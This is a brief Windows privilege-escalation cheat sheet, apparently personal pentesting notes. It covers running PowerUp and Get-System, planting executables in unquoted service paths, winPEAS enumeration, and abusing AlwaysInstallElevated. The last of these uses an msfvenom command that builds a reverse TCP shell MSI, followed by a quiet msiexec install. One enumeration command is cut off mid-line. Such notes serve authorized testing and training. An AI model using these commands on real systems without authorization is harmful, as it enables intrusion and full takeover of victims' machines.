Privilege Escalation


Try to use dev brach always. PowerView has some cool functions to use.

powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

Unquoted Service Paths

Let's say we have a system path like below.

C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

Windows will first try execute it like below in the following order

  • c:\program.exe

  • C:\Program Files\IObit\Advanced.exe

  • C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

If we can plant the exe in one of the paths below we can elevate privileges

  • Please note that we need to either have the ability to restart the machine or restart the service. Otherwise it's useless kinda.

Enumerating unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v 


It is a great privilege escalation enumeration tool. Find the releases below and simply execute the binary.

.\winPEASx64_ofs.exe notcolor quiet


Always Install Elevated

Detecting if the OS is vulnerable,

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If always install elevated is enabled, queries above should return 1.

Exploiting it is pretty simple. Generate an msi payload,

msfvenom -p windows/shell/reverse_tcp lhost= lport=9001 -f msi > shell.msi

Execute it,

msiexec /quiet /qn /i 1.msi

Last updated